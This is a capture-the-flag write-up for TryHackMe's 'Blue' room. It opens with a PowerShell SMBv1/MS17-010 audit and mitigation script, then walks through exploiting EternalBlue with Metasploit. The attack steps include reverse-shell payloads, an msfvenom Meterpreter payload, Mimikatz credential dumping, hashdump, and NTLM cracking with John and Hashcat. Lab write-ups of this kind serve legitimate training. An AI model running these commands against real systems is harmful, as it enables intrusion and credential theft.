THM - EternalBlue - Write Up
Deploy & hack into a Windows machine, leveraging common misconfiguration issues.
Find This Room: Blue
What Is EternalBlue
EternalBlue is a vulnerability in the SMBv1 (Server Message Block version 1) protocol that allows remote command execution on an unpatched host.
This vulnerability was discovered in Windows 7 and Windows Server 2008. It has been widely exploited by ransomware such as WannaCry.
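Before walking through the attack, here is a defender-side check added to this write-up (it is not part of the room or of Metasploit): a PowerShell audit that reports whether the local Windows 7 / Server 2008 R2 host still has the SMBv1 server enabled and whether an MS17-010 hotfix is installed, together with the registry change Microsoft documents for disabling the SMBv1 server. Assumptions: the KB list covers only those two OS versions (extend it for other builds), the function names are ours, and the script is run from an elevated prompt.

```powershell
# Added audit script, not from the room. Run elevated on the Windows host.
# Assumption: these two KBs are the MS17-010 updates for Windows 7 SP1 /
# Server 2008 R2 (security-only and monthly rollup); add the KBs for other builds.
$Ms17010Kbs   = @('KB4012212', 'KB4012215')
$LanmanParams = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb1ServerState {
    # Microsoft's documented switch is the SMB1 DWORD under LanmanServer\Parameters.
    # When the value is absent the default applies, which on Win7/2008 R2 is enabled.
    $v = (Get-ItemProperty -Path $LanmanParams -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $v) { return 'Enabled (default, value absent)' }
    if ($v -eq 0)     { return 'Disabled' }
    return 'Enabled'
}

function Test-Ms17010Patched {
    param([string[]]$Kbs = $Ms17010Kbs)
    # Get-HotFix lists installed updates; a later cumulative rollup can supersede
    # these KBs, so a $false here means "verify", not "definitely unpatched".
    $installed = Get-HotFix -ErrorAction SilentlyContinue | Select-Object -ExpandProperty HotFixID
    foreach ($kb in $Kbs) { if ($installed -contains $kb) { return $true } }
    return $false
}

function Disable-Smb1Server {
    # Mitigation: set SMB1=0 and restart the Server service so the change takes effect.
    Set-ItemProperty -Path $LanmanParams -Name SMB1 -Type DWord -Value 0 -Force
    Restart-Service -Name LanmanServer -Force
}

$state   = Get-Smb1ServerState
$patched = Test-Ms17010Patched
Write-Host "SMBv1 server: $state"
Write-Host "MS17-010 hotfix present: $patched"
if ($state -ne 'Disabled' -and -not $patched) {
    Write-Warning 'Host is exposed to EternalBlue (MS17-010): run Disable-Smb1Server and apply the MS17-010 update.'
}
```

Disabling SMBv1 stops this exploit but also breaks clients that only speak SMBv1, so apply the patch as well rather than relying on the registry change alone.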
1- Recon
Identify the target:
Specify the IP address of the target device.
Operating system:
If you know the type of operating system, this will help you determine how to take advantage of the vulnerability.
You can use tools like nmap or netcat to collect this information.
SMB port analysis
Port scanning using nmap
Determine port status:
nmap -p 445 <target_ip>
Full scan:
To look for additional details, you can scan all ports and see what services and applications are running on the device.
nmap -p 1-65535 -T4 -A -v <target_ip>
Options:
-p 1-65535: Scan all TCP ports.
-T4: Use the aggressive timing template to speed up the scan.
-A: Enable OS detection, version detection, script scanning and traceroute.
-v: Show details.
Verify the vulnerability
Use Metasploit
Select the appropriate tool:
Open the Metasploit console and use the EternalBlue exploit module (ms17_010_eternalblue).
2- Gain Access
Start Metasploit
msfconsole
Module options we will set before running the exploit against the machine (RHOSTS is the option name in msf6, as in the check below):
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <Your_IP>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <Target_IP>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/shell/reverse_tcp
Vulnerability verification:
Check if the device is vulnerable to exploitation.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 192.168.1.10:445 - The target is vulnerable.
Running the exploit:
If the check reports the device as vulnerable, run the exploit to gain a shell on the device.
exploit
3- Escalate
Escalate privileges and learn how to upgrade shells in Metasploit.
Background the previously gained shell (CTRL + Z)
Convert a command shell to a Meterpreter shell in Metasploit
1- Using the sessions -u command:
- After gaining a shell session on the target machine, you can use the sessions command to upgrade it to a Meterpreter session. First, list your active sessions to find the session ID:
sessions
Once you have the session ID (e.g., 1), run the following command to upgrade the shell session to Meterpreter:
sessions -u 1
2- Using the shell_to_meterpreter post-exploitation module:
- Metasploit provides a specific post-exploitation module designed to upgrade a shell to Meterpreter. Load the module and set the session ID you want to upgrade:
use post/multi/manage/shell_to_meterpreter
set SESSION 1
exploit
This method will automatically select the best Meterpreter payload based on the target platform.
3- Manual payload injection:
- If you prefer a more hands-on approach, you can manually inject a Meterpreter payload into the shell. Generate a Meterpreter payload using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe > meterpreter.exe
Transfer this payload to the target machine using your command shell, and execute it to establish a Meterpreter session.
4- Cracking
1- Fetch saved passwords in Windows
Using Mimikatz with Meterpreter
Load Mimikatz in the session:
After getting a Meterpreter session, load the kiwi extension, which is the current Meterpreter build of Mimikatz (the older mimikatz extension is deprecated in favour of it):
meterpreter > load kiwi
Using Mimikatz commands:
After loading the extension, you can run Mimikatz commands through kiwi_cmd; for example, the following lists and exports Kerberos tickets:
meterpreter > kiwi_cmd kerberos::list /export
Extract passwords:
Use the following command to extract plain-text passwords and other credential material from memory.
meterpreter > creds_all
Use post/windows/gather/hashdump
Select session:
After obtaining the Meterpreter session, background it and use the hashdump post module from the msf6 prompt to fetch the password hashes (use and set are msfconsole commands, not Meterpreter commands).
msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(windows/gather/hashdump) > run
2- Crack password hashes
Use John the Ripper
Download John the Ripper:
Make sure you have downloaded and installed John the Ripper.
Save hashes to a file:
Save the hashes you obtained from hashdump to a text file, such as hashes.txt.
Run John the Ripper:
Use John the Ripper to crack the NTLM hashes.
john --format=NT hashes.txt
Use Hashcat
Download Hashcat:
Make sure you have downloaded and installed Hashcat.
Run Hashcat:
Use Hashcat to crack the hashes (-m 1000 selects NTLM, -a 0 is a straight wordlist attack).
hashcat -m 1000 -a 0 hashes.txt /path/to/wordlist.txt
Happy Hacking
Follow me / support: patreon.com/mosec